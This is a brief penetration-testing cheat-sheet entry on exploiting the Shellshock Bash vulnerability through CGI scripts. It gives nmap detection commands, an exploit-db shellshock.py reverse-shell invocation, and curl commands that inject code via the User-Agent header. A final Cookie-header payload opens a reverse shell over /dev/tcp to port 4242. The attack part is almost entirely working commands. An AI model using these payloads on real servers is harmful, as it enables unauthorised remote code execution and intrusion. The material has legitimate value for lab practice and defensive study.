ShellShock
Table of content
Description
Iterate the cgi-bin
directory agains *.sh
, *.pl
, *.cgi
and *.py
.
When one script is found, use the nmap
http-shellshock
script:
nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
If vulnerable, it is possible to exploit it :
# https://www.exploit-db.com/exploits/34900
shellshock.py payload=reverse rhost=10.10.10.56 lhost=<LAB IP> lport=<port> pages=/cgi-bin/user.sh
Or manually through curl
:
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh